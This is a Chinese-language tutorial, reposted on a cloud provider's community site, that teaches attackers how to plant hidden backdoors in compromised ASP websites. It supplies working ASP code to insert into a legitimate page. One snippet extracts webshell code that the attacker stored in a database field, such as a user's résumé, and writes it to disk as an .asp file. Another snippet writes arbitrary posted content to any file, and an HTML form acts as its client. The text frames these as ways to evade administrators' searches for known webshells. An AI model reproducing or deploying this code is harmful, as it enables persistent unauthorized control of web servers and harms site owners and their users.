教你巧妙利用.mdb尾碼資料庫做後門

來源:互聯網
上載者:User
資料|資料庫

前言:好長時間了,從剛開始的網站管理器到現在流行的幾款asp後門,相信大多網管都能說出這些經典webshell的名字,如海洋、老兵、藍屏等,也相信大多數的網管學會了關鍵字的搜尋方法來搜尋這些木馬,當然現在的時間如果再象隱藏後門就要講些技巧啦,俗話說的好“佛高一尺,我高一丈”。

我不否認n早前的那個把asp木馬寫到圖片檔案中不失為一種好的方法,其實不僅可以寫到圖片啦寫到mp3檔案裡寫到doc檔案裡都是可以的啦。

copy檔案名稱/參數+檔案名稱/參數組建檔案名

這樣的方法可以很靈活的運用來達到隱藏檔案的目的,具體的參數就是/a以acsic碼方式,/b二進位方式,就不羅嗦這些了,至於如何上傳webshell,什麼是webshell也不屬於本文的討論範圍。今天要講的是如何把後門放到尾碼.mdb的中,前提是在我們拿到一個webshell之後……

我們所知道的,很多網站在使用者註冊的時候要讓填好多東西例如:使用者名稱、密碼、QQ、郵箱、簡歷、電話、連絡方式、住址一類的。而對應到中也都會有相應的表、欄位、值。我今天要做的就是,我註冊一個使用者在我的簡歷的地方上寫入shell代碼,然後修改他網站上的一個檔案,使用的時候觸發這個檔案,就把我個人簡曆中的shell代碼,備份到目前的目錄下。

廢話少說了,大家看代碼:


<%
ifrequest("action")="firefox"then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
setrs=server.createobject("ADODB.recordset")
sql="select"&bname&"from"&tname&"where"&id&"="&idvalue&""""
rs.opensql,conn,1,3
ifnotrs.eofthen
content=rs(bname)
else
response.write"Nothing"
endif
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
endif
%>

將上邊的代碼加到網站的一個檔案中,如news.asp。根據我們瞭解的資訊,在其網站註冊後,下載看結構。我註冊的firefox名字是在user表,其id值為119用於存放我註冊簡曆的表欄位為jl。

news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

那麼在使用的時候我們就可以在news.asp相同目錄下寫入一個名為firefox.asp的webshell。以上可以說是萬千隱藏方法中的一種,下邊再說另外一種更方便的隱藏方法,這個方法就和mdb尾碼無關係了。

同樣我們還是修改news.asp,將以下代碼插入到對方news.asp中:


<%
ifrequest("action")="firefox"then
n=request.form("n")
c=request.form("c")
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
endif
%>

這段代碼相對簡單些,算是一個木馬的服務端吧。使用的時候以這段代碼配合:


<HTML><HEAD>
<METAhttp-equiv=Content-Typecontent="text/html;charset=gb2312">
<title>F.s.tFirefox技術聯盟[www.wrsky.com]</title>
<FORMaction="...method=post>
<METAcontent="MSHTML6.00.2900.2180"name=GENERATOR></HEAD>
<BODY>Name:<INPUTsize=50
name=nwidth="32"><BR><BR>Shell:<TEXTAREAname=crows=10cols=80
width="32"></TEXTAREA><INPUTtype=submitvalue=Save></FORM></BODY></HTML>

將以上代碼中的:“http://localhost/config.asp?action=firefox”替換成你的服務端地址,然後儲存為本地的.htm檔案。本地開啟後定義要產生的檔案名稱、檔案內容、遠程提交,ok,又是一種留後門的方法。



相關文章

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。